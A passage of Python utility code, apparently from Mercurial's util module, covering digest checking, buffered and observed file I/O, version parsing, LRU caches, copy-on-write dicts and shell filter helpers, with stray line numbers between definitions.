# Supported digest algorithms, keyed by wire-protocol name.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# sanity check: the preference list must only name known digests
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
275
275
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        # feed the same data to every selected hash
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            # fix: this error path previously referenced the undefined name
            # 'k', raising NameError instead of the intended Abort message
            raise Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
322
322
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        # every byte read is folded into the running digests
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        """Raise Abort unless exactly `size` bytes were read and every
        expected digest matches the computed one."""
        if self._size != self._got:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (k, v, self._digester[k]))
try:
    buffer = buffer
except NameError:
    # Python 3 has no buffer() builtin; emulate it with zero-copy
    # memoryview slices.
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]
362
362
# whether subprocesses should close inherited file descriptors
# (enabled on POSIX only)
closefds = pycompat.isposix

# chunk size used by bufferedinputpipe._fillbuffer for os.read()
_chunksize = 4096
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []     # pending chunks, newest last
        self._eof = False     # set once os.read() returns no data
        self._lenbuf = 0      # total number of buffered bytes

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # pull more data until EOF or at least `size` bytes are buffered
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
469
469
def mmapread(fp):
    """Return a read-only mmap of `fp`'s entire contents.

    `fp` may be a file object (its fileno() is used) or a raw file
    descriptor. Empty files cannot be mmapped, so an empty buffer is
    returned for them instead of raising.
    """
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
480
480
def popen2(cmd, env=None, newlines=False):
    """Run `cmd` through the shell; return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    p = subprocess.Popen(cmd, shell=True, bufsize=-1,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout
491
491
def popen3(cmd, env=None, newlines=False):
    """Like popen4(), but drop the Popen object and return only the pipes."""
    stdin, stdout, stderr, p = popen4(cmd, env, newlines)
    return stdin, stdout, stderr
495
495
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run `cmd` through the shell; return (stdin, stdout, stderr, proc)."""
    p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout, p.stderr, p
504
504
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        # bypass our own __setattr__, which forwards to the wrapped object
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)
657
657
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        # notify the observer of the raw os.read() that just happened
        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res
697
697
# Map every byte to its \xNN escape, then override a few common bytes with
# shorter, more readable escapes.
DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
# Bytes that need escaping: control characters (except tab, \x09),
# backslash, and non-ASCII bytes.
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
705
705
def escapedata(s):
    """Escape bytes in `s` for single-line logging output.

    bytearray input is converted to bytes first so the regex map lookup
    receives hashable bytes keys.
    """
    if isinstance(s, bytearray):
        s = bytes(s)

    return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
711
711
class fileobjectobserver(object):
    """Logs file object activity.

    Each callback receives the *result* of the proxied call plus its
    arguments and writes a one-line summary to ``fh``. When ``logdata``
    is set, the transferred payload is appended (escaped) as well.
    """
    def __init__(self, fh, name, reads=True, writes=True, logdata=False):
        self.fh = fh          # stream receiving the log lines
        self.name = name      # label prefixed to every log line
        self.logdata = logdata
        self.reads = reads    # whether read-side events are logged
        self.writes = writes  # whether write-side events are logged

    def _writedata(self, data):
        # Terminate the summary line; optionally dump the payload.
        if not self.logdata:
            self.fh.write('\n')
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            self.fh.write(': %s\n' % escapedata(data))
            return

        # Data with newlines is written to multiple lines.
        self.fh.write(':\n')
        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n' % (self.name, escapedata(line)))

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                  res))
        # res is the byte count actually read (or None); only that prefix
        # of dest is meaningful.
        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        self.fh.write('%s> bufferedread(%d) -> %d' % (
            self.name, size, len(res)))
        self._writedata(res)

    def bufferedreadline(self, res):
        self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
        self._writedata(res)
790
790
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False):
    """Turn a file object into a logging file object.

    ``logh`` receives the log lines; ``fh`` is the file object to wrap.
    Returns a proxy that forwards all I/O to ``fh`` while reporting it
    to a fileobjectobserver.
    """

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata)
    return fileobjectproxy(fh, observer)
798
798
def version():
    """Return version information if available.

    Falls back to the literal string 'unknown' when the generated
    __version__ module is absent (e.g. running from a source checkout).
    """
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'
806
806
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split off the "extra" part at the first '+' or '-'. Raw string avoids
    # the invalid '\+' escape warning; the pattern is byte-identical.
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # Stop at the first non-numeric component.
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
875
875
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    if func.__code__.co_argcount == 0:
        # Zero-argument functions: a one-slot list doubles as the cache.
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f
901
901
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        # _copied counts outstanding shared references created by copy();
        # a real (shallow) copy is only made while someone else shares us.
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
919
919
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Re-setting a key moves it to the end (last-set order), unlike
        # plain OrderedDict which keeps the original position.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
944
944
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
970
970
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
976
976
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # close() only on clean exit; release() unconditionally so an
        # unclosed transaction is aborted even when close() raises.
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()
1001
1001
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is a "pause", not a failure: commit what we
        # have so the user can resume, then re-raise.
        tr.close()
        raise
    finally:
        tr.release()
1019
1019
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing (yields None)."""
    yield
1023
1023
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    # __slots__ keeps per-node memory small; the cache allocates many nodes.
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # _notset (module-level sentinel) marks a node with no entry.
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1042
1042
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        # Start with a single self-linked node; capacity grows lazily.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
1201
1201
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    # deque tracks recency; oldest entries are evicted from the left once
    # the cache holds more than 20 entries (historical fixed bound).
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f
1228
1228
class propertycache(object):
    """Decorator: compute an attribute once, then cache it on the instance.

    After the first access the cached value shadows the descriptor via
    the instance __dict__, so subsequent accesses skip __get__ entirely.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1241
1241
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # propertycache stores values directly in the instance __dict__, so
    # removing the entry forces recomputation on next access. No-op when
    # the property was never computed.
    if prop in obj.__dict__:
        del obj.__dict__[prop]
1246
1246
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    # NOTE(review): cmd is passed to a shell; callers are expected to supply
    # trusted filter commands from configuration.
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    # stderr is not captured (perr is None with these pipes).
    return pout
1253
1253
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            # On OpenVMS an odd status means success.
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # Best-effort cleanup of both temp files; ignore races/missing files.
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
1287
1287
# Maps a filter-command prefix to the implementing function; commands with
# no recognized prefix fall back to pipefilter (see filter() below).
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
1292
1292
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # Dispatch on a 'tempfile:'/'pipe:' prefix; strip the prefix (and
    # leading whitespace) before handing the command to the handler.
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)
1299
1299
def binary(s):
    """return true if a string is binary data"""
    # Heuristic shared with diff tools: any NUL byte marks data as binary;
    # empty/None input is not binary.
    return bool(s and '\0' in s)
1303
1303
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # floor(log2(x)); 0 for x == 0.
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                # Grow the threshold: at least double it, and jump to the
                # largest power of two <= the emitted size, capped at max.
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        # Trailing partial chunk (smaller than min) is still emitted.
        yield ''.join(buf)
1334
1334
# Historical re-export: error.Abort has long been reachable as util.Abort.
Abort = error.Abort
1336
1336
def always(fn):
    """Matcher predicate that accepts every input."""
    return True
1339
1339
def never(fn):
    """Matcher predicate that rejects every input."""
    return False
1342
1342
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        # Remember prior state so we only re-enable GC if it was on;
        # re-enabling happens even when func raises.
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper
1365
1365
if pycompat.ispypy:
    # PyPy runs slower with gc disabled, so make nogc a no-op there
    nogc = lambda x: x
1369
1369
def pathto(root, n1, n2):
    """Return the relative path leading from n1 to n2.

    root and n1 use os.sep to separate directories; n2 uses "/".
    If n1 is relative it is assumed relative to root; n2 must always
    be relative to root.  The result is os.sep-separated.
    """
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives: no relative path exists, anchor at root
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    src, dst = splitpath(n1), n2.split('/')
    src.reverse()
    dst.reverse()
    # drop the common prefix, comparing from the reversed tails
    while src and dst and src[-1] == dst[-1]:
        src.pop()
        dst.pop()
    dst.reverse()
    return pycompat.ossep.join((['..'] * len(src)) + dst) or '.'
1395
1395
def mainfrozen():
    """Return True when running as a frozen executable.

    Supports py2exe (most common, Windows only; both the new and the
    old marker attribute) and tools/freeze (portable, rarely used).
    """
    if safehasattr(sys, "frozen"): # new py2exe
        return True
    if safehasattr(sys, "importers"): # old py2exe
        return True
    return imp.is_frozen(u"__main__") # tools/freeze
1405
1405
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

# cached location of the 'hg' executable, filled lazily by hgexecutable()
_hgexecutable = None
1416
1416
